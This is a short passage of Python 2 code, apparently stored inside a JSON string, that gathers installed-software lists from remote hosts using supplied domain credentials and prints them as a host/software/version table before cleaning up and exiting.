tmpAppList=getInstalledPrograms(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)        \n        for y in tmpAppList:\n            tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        headers = [\"Host\",\"Software\", \"Version\"]\n        print tabulate(tmpResultList,headers,tablefmt=\"simple\")\ncleanUp()\nos._exit(0)\n\n"
  }
]